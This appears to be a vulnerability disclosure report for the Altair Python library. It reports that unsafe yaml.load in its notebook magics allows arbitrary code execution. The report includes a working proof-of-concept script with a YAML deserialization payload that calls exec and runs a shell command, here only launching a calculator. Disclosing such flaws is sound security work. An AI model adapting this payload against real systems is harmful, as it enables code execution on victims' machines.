altair

⚙️ Description *

Altair is a declarative statistical visualization library for Python. With Altair, you can spend more time understanding your data and its meaning. Altair's API is simple, friendly and consistent and built on top of the powerful Vega-Lite JSON specification. This elegant simplicity produces beautiful and effective visualizations with a minimal amount of code. Altair is developed by Jake Vanderplas and Brian Granger in close collaboration with the UW Interactive Data

💻 Technical Description *

Yaml.load was exploitable to Arbitrary Code Execution

🐛 Proof of Concept (PoC) *

• run the exploit code

import os
# installation 
os.system("pip install altair vega_datasets")
#
import altair._magics as magics
payload = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
with open("exploit.yml","w+") as cell :
    cell.write(payload)
with open("exploit.yml","r+") as cell :
    magics.vegalite("1",cell)

• calc will be popped after executing the exploit code.